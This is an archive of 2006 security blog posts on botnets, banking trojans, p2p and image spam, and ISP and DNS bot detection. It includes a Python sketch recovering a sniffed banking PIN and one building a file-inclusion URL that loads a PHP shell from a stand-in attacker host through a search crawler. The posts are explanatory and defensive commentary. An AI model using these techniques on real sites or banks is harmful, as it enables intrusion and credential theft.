Posted on December 10th, 2006 by SecuriTeam
Filed under: Botnets, Cisco, Commentary, Corporate Security, DDoS, Full Disclosure, Microsoft, Networking, Phishing, Rootkits, Spam, Virus, Web | No Comments »
isoi 2 is finalized. the schedule and agenda can be found here:
i am going to do my best to release some of these presentations publicly after the event (if the authors agree), but it is not likely.
some public feedback will be relayed from the workshop.
Posted on November 26th, 2006 by noam
Filed under: Botnets, Commentary, Corporate Security, Encryption, Full Disclosure, Phishing, Web | 15 Comments »
recently, i stumbled upon http://www.hispasec.com/laboratorio/cajamurcia_en.htm, which nicely shows how a trojan horse can grab a user’s pin fairly easily by combining keystroke capture with screenshot capture. it made me wonder why the bad guys take this approach when the pins can be retrieved just as easily by sniffing the data the user sends to the banking site, even though it is “encrypted”.
image-based keyboards (or virtual keyboards) were invented to make life harder for banking or phishing trojan horses (specifically keystroke loggers, or key loggers); some even suggested they be used specifically to avoid these trojan horses. the bad guys adapted to this technology and escalated: the trojan horses now take a screenshot around the mouse pointer on each click to determine which number was clicked. thing is, this is often unnecessary, as most implementations of the technique that we looked into (meaning, not all) were flawed.
instead of sending the remote image and waiting for the keystroke information to be sent back to the server (the technique targeted by the on-click pointer screenshots described above), some banks send the pin in cleartext, while others encrypt it; one such example is cajamurcia. even when encryption is used, banks tend to implement it badly, making it easy to recover the pin from its encrypted form.
i investigated a bit more into how cajamurcia handles such pin strokes (with virtual keyboards) and noticed something strange: they take the timestamp of their server (cajamurcia) and send it to you – this already poses a security problem – and this timestamp is then used to encrypt the pin you entered.
this would have been a reasonable idea if the timestamp were not sent back to the server, making it hard or semi-hard for an attacker to guess the timestamp used to encrypt the data (though also making it harder for the server to know which timestamp was provided to the client, unless it is stored in the session information). but as the timestamp is sent back to the server, a sniffer captures everything needed to decrypt the data (the pin).
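to make the flaw concrete, here is a minimal sketch of a timestamp-keyed scheme of this kind – the key derivation, function names and values are my own illustrative assumptions, not cajamurcia’s actual code:

```python
import hashlib

def keystream(timestamp: str, length: int) -> bytes:
    # hypothetical key derivation: hash the server timestamp (illustration only)
    return hashlib.sha256(timestamp.encode()).digest()[:length]

def encrypt_pin(pin: str, timestamp: str) -> bytes:
    # xor the pin digits against the timestamp-derived keystream
    return bytes(p ^ k for p, k in zip(pin.encode(), keystream(timestamp, len(pin))))

def decrypt_pin(ciphertext: bytes, timestamp: str) -> str:
    # xor is its own inverse, so the same keystream decrypts
    return bytes(c ^ k for c, k in zip(ciphertext, keystream(timestamp, len(ciphertext)))).decode()

# the client sends BOTH the timestamp and the "encrypted" pin in one request,
# so anyone sniffing that request can decrypt on the spot:
sniffed_timestamp = "20061126093241"
sniffed_cipher = encrypt_pin("4821", sniffed_timestamp)
recovered = decrypt_pin(sniffed_cipher, sniffed_timestamp)  # -> "4821"
```

whatever the actual cipher, the point is the same: when the only key material (the timestamp) rides alongside the ciphertext, the “encryption” is just an encoding.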
a request to the server would look like:
Posted on November 23rd, 2006 by noam
Filed under: Botnets, Commentary, Corporate Security, Google, Insider Threat, Rootkits, Virus, Web | 22 Comments »
google can be utilized to hack into websites – actively exploiting them (not information gathering by the use of “google hacking”, although that is how most of the sites vulnerable to rfi attacks are found).
if a url is placed on any web page, google will find it, visit it and then index it. with this mechanism, it is possible to anonymize attacks on third party web sites by routing them through google’s crawler.
a malicious web page is constructed by an attacker, containing a url built like so:
1. third party site uri to attack.
2. file inclusion exploit.
3. second uri containing a malicious php shell.
google will harvest this url and visit it with its crawler – meaning it accesses the target site with the url it was handed, unwittingly exploiting the site for whoever planted the link. it’s a feature, not a bug.
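the three numbered parts above compose into a single url. here is a sketch with hypothetical hostnames and a hypothetical vulnerable parameter (no real site implied):

```python
from urllib.parse import quote

# hypothetical names for illustration only
target = "http://victim.example/index.php"   # 1. third party site uri to attack
vuln_param = "page"                          # 2. the file-inclusion parameter
shell = "http://evil.example/cmd.txt?"       # 3. second uri hosting a php shell

# percent-encode the shell uri so it survives as a single parameter value
planted_url = f"{target}?{vuln_param}={quote(shell, safe='')}"

# an attacker places planted_url on any crawled page; when the crawler
# fetches it to index the content, the request itself triggers the inclusion:
# http://victim.example/index.php?page=http%3A%2F%2Fevil.example%2Fcmd.txt%3F
```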
this is currently exploited in the wild. for example, try searching google for:
and note, as an example:
which is no longer vulnerable. the %20 seems out of place, but this is how it is shown in the search.
why use a botnet when one can abuse the google crawler, which is allowed on most web sites?
1. this attack was verified on google, but there is no reason why it should not work with other search engines, web crawlers and web spiders.
2. file inclusions seem to tie in well with this attack anonymizer, but there is no reason other attack types can’t be used in a similar fashion.
3. the feature might also be used to anonymize communication, as a covert channel.
(with thanks to Sun Shine and lev toger)
Posted on November 22nd, 2006 by SecuriTeam
Filed under: Botnets, Commentary, Corporate Security, Phishing, Spam, Virus | 4 Comments »
spam on p2p networks used to consist mainly of advertising embedded inside downloaded movies and pictures (mainly pornographic in nature), as well as viruses and other malware hidden in downloaded warez and most any other file type (from zip archives to movie files). further, p2p networks were in the past used by spammers for address harvesting.
today, p2p has become a direct-to-customer spamvertizing medium. this change has been ongoing for a while; as we speak, it is moving from proof-of-concept trials to a full spread of spam, day in, day out.
the idea is not new, but now it is becoming serious.
some choice picks:
ebook – googlecash – make money using google (learn to use affiliate programs to make easy money).pdf [i've been made aware this one is a real, yet pirated, book. call it a false positive]
us banks acounts information [dir]
how to create an automated ebay money machine.pdf
easy chair millionaire review.pdf
press equalizer review – flood your site with targeted traffic, achieve top rankings and gain dozens or more backlinks.pdf
top home based jobs [dir]
and so on. these are just some of the scams now being pushed over p2p.
we discussed this before; it started with fake books on the subject of online marketing, and now the spammers/phishers/“affiliate programs”/spyware pushers (in other words, online-fraud-related organized crime groups) have gone all the way, looking for new ways and mediums by which to reach a target audience as email becomes more and more scrutinized and filtered.
Posted on November 20th, 2006 by SecuriTeam
Filed under: Botnets, Commentary, Spam, Web | 6 Comments »
thanks for the image to jeff chan. click on it for full size.
for months now, images have been increasingly seen in spam, reaching up to 30 to 40 per cent of all spam. for a while, counter-measures have been in play, developed by many different folks, some we know, some we don’t – from system administrators developing signatures to a team at spamassassin working on an ocr system to break these images and check their text for spamishness.
when first encountered, a friend of mine was as excited as me: “why, it’s exactly like a captcha, only in reverse!”
hence the term i just coined – reverse captcha.
as it’s a cat-and-mouse game of escalations and counter-measures between bad guys and good guys, the bad guys learn and make our lives more difficult. i will try to explain what a reverse captcha is to me (and no, it’s not a special type of turing test, although we touch on that below).
Posted on November 10th, 2006 by SecuriTeam
Filed under: Botnets, Phishing, Virus, Web | 2 Comments »
websense has done some amazing work, and posted a blog entry on webattacker.
Posted on October 30th, 2006 by SecuriTeam
Filed under: Botnets, Commentary, Spam | 2 Comments »
fergie (paul ferguson) just sent this to funsec:
from the duh-its-a-bot-department!
via abc news’ “the blotter”.
a foreign hacker who penetrated security at a harrisburg, pa., water
filtering plant is under investigation by the fbi for planting
malicious software capable of affecting the plant’s water treatment
operations, abc news has learned.
the hacker tried to covertly use the computer system as its own
distribution system for e-mails or pirated software, officials told abc.
Posted on October 24th, 2006 by SecuriTeam
Filed under: Botnets, Commentary, Phishing, Privacy, Rootkits, Spam, Virus, Web | No Comments »
as can be seen in the quoted message below –
so, here we go. real-life uses for vulnerabilities.
below is an example of just one “drop-zone” server in the united states, which has “600 financial companies and banks”.
several gigs of data.
how do these things work?
Posted on October 24th, 2006 by SecuriTeam
Filed under: Botnets, Commentary | 4 Comments »
so, what i am going to talk about… a tad bit of history on vulnerabilities and their use on the internet, and then, what we are going to see on corporate, isp and internet security relating to botnets this coming year.
vulnerabilities don’t exist for the sake of vulnerabilities. they are used for something, they are a tool. botnets are much the same, using vulnerabilities on the next layer.
this past year we have seen how disclosed vulnerabilities, patched vulnerabilities and 0days have been utilized by automated kits: inter-linked systems of websites which download malicious code (updates to the kits), try to infect millions of users from just a couple dozen main hubs, and react to the environment.
if a certain vulnerability is seen to be more successful on certain os types, or if one is found not to work, the kit will be fixed accordingly and redistributed – often immediately after a patch tuesday, likely that same friday evening.
this way, income can be maximized in the number of infections and the amount of data stolen, and thus roi – both by exploiting the expected response time of the vendors and by maximizing how many victims can be reached in that window.
one such kit is webattacker, which has recently been getting more known in public circles.
Posted on October 24th, 2006 by SecuriTeam
Filed under: Botnets, Networking | 5 Comments »
i saw a pr last month from mcafee on this issue, and now they have issued another one.
for most cases, i don’t believe in ids products.
i think that trying to pitch i[dp]s as a solution for botnets is plain and simple silly technologically, but marketing-wise it is right on the spot.
a lot of security vendors will now start taking that approach, dealing with the buzzword.
an ips will not cure your botnet problems. it may help pinpoint some bots (or similar) on your network, which is important, but that’s about it.
i wish mcafee all the luck in the world, but this is, in my opinion, way way way over-hyped:
in another pr they present a case study on how they saved a south american country from a botnet attack using their ips. i would like to see more – something to back up how it was done – before i state my opinion.
what do you think?
Posted on October 19th, 2006 by SecuriTeam
Filed under: Botnets, Networking, Virus, Web | 2 Comments »
this just hit full-disclosure:
while building and testing a customized version of devillinux router
distro i found an irc bot onboard. as far as i understood, it was
energymech compiled from source right there plus some executable named
“todo” (for camouflage purposes). the stuff unfolds at /shm/sshd/ and
runs somehow. sadly, i had no time for detailed investigation. it leaves
an overall impression of script kiddie’s work.
last days devillinux website seems to be dead.
digital channels network
update from the botnets mailing list at whitestar:
Posted on October 16th, 2006 by SecuriTeam
Filed under: Botnets, Cisco, Commentary, Networking, Spam, Virus | 8 Comments »
i am starting a discussion in the relevant groups on this subject, to try and come up with some suggestions and to-do items we can follow up on, or maybe even better – find another solution.
networks require a means by which they can control their botnet population. yes, “curing” the problem is great, but it won’t happen in the near future.
obviously, having isps call even one customer to remove an infection doesn’t work (each attempt costs significantly more than the subscription fee) and people just get re-infected.
i am looking to utilize proven technology to be able to reduce the cost of what a botnet can do.
if botnet traffic is detected – even by unsophisticated means such as simply checking for email sent from dynamic ranges, or by examining netflow data – it should be possible to use routing technology to “mitigate”.
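as a sketch of how crude such detection can be and still be useful, here is a toy netflow-style check – the address ranges and flow records are invented for illustration:

```python
import ipaddress

# hypothetical dynamic-ip pools for an isp (illustrative, not real allocations)
DYNAMIC_RANGES = [ipaddress.ip_network("10.20.0.0/16"),
                  ipaddress.ip_network("10.30.0.0/16")]

def looks_like_spambot(src_ip: str, dst_port: int) -> bool:
    """flag direct-to-mx smtp traffic originating from dynamic ranges --
    the simple check described above."""
    ip = ipaddress.ip_address(src_ip)
    from_dynamic = any(ip in net for net in DYNAMIC_RANGES)
    return from_dynamic and dst_port == 25

# flows as (src, dst_port) tuples, e.g. exported netflow records
flows = [("10.20.1.5", 25), ("10.20.1.9", 80), ("192.0.2.7", 25)]
suspects = [src for src, port in flows if looks_like_spambot(src, port)]
# suspects == ["10.20.1.5"]
```

once flagged, the same ip list can feed a routing or qos policy instead of a phone call to the customer.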
qos can limit the traffic these bots utilize, much like it does for p2p users at most isps today. these users already suffer degraded connectivity due to the effects of the bot anyway.
how can this be done using today’s technology? does it require a re-design of hardware, or new systems to be designed? i hope to find out and get a proposal ready.
Posted on October 13th, 2006 by SecuriTeam
Filed under: Botnets, Cisco, DDoS, Full Disclosure, Microsoft, Phishing, Spam, Virus, Web | No Comments »
the second internet security operations and intelligence (isoi) da workshop will take place on the 25th and 26th of january, 2007. it will be hosted by the microsoft corporation, in redmond wa. an after-party dinner will be hosted by trendmicro.
this workshop’s main topic is botmaster operational tactics – the use of vulnerabilities and 0day exploits in the wild by spyware, phishing and botnet operations, for their businesses.
secondary subjects include ddos, phishing and general botnet subjects.
Posted on October 1st, 2006 by Thor Larholm
Filed under: Botnets, Commentary, Full Disclosure, Web | 19 Comments »
It seems like Internet Explorer has taken a lot of heat lately with a rash of 0day vulnerabilities (if you do use IE, then do yourself a favor and visit ZERT), but has the time come for Firefox to shine as well? If you take a brief look at the list of publicly known vulnerabilities in Firefox, it should come as no surprise that there is naturally a slew of undisclosed vulnerabilities as well.
At the ToorCon 2006 conference, Mischa Spiegelmock and Andrew Wbeelsoi made a point of demonstrating a live exploit running in Firefox 126.96.36.199. Their main motivation was apparently to create bot networks for their personal use, or in their own words – “communication networks for black hats”.
Posted on September 26th, 2006 by SecuriTeam
Filed under: Botnets, Commentary, Corporate Security, DDoS, Networking, Spam, Virus | No Comments »
is here. several companies are rehashing their old products and buzzwording them for ddos mitigation or botnets – but not trend micro.
trend micro released a brand new product, implemented around the novel idea of utilizing dns to detect bots on an isp or corporate network: whether by massive requests for a c&c (bots phoning home), massive requests for mx records (spam bots), or negative caching (nxdomain answers being cached because the c&c is not up yet but is already being requested), and beyond.
it works. i don’t know if that’s what trend micro is doing, but it’s one step in the right direction to better botnet detection and mitigation.
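a toy version of such a dns heuristic – the log format, hosts and thresholds here are invented for illustration, and certainly not trend micro’s implementation:

```python
from collections import Counter

# hypothetical per-host dns query logs as (qtype, rcode) pairs
logs = {
    "10.0.0.5": [("MX", "NOERROR")] * 200,   # spam bot resolving mx records in bulk
    "10.0.0.6": [("A", "NXDOMAIN")] * 150,   # bot hammering a not-yet-live c&c name
    "10.0.0.7": [("A", "NOERROR")] * 20,     # normal host
}

def dns_suspects(logs, threshold=100):
    """flag hosts with heavy mx lookups or heavy nxdomain answers --
    a toy version of the detection idea described above."""
    flagged = []
    for host, queries in logs.items():
        mx_count = Counter(qtype for qtype, _ in queries)["MX"]
        nx_count = sum(1 for _, rcode in queries if rcode == "NXDOMAIN")
        if mx_count >= threshold or nx_count >= threshold:
            flagged.append(host)
    return flagged

# dns_suspects(logs) == ["10.0.0.5", "10.0.0.6"]
```

the appeal of the dns vantage point is that one resolver sees the behavior of thousands of hosts without touching the hosts themselves.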
Posted on September 19th, 2006 by SecuriTeam
Filed under: Botnets, Commentary, Virus | No Comments »
yadda yadda yadda.
one thing of note about these botnets is that im is a controlled service, and therefore these things can be shut down by the im operators if they so choose.
“we think this group have many more executable files ready and waiting to go live, so where this one will end up is anyone’s guess.”
it’s long dead (with those already infected possibly reporting to alternate c&c channels).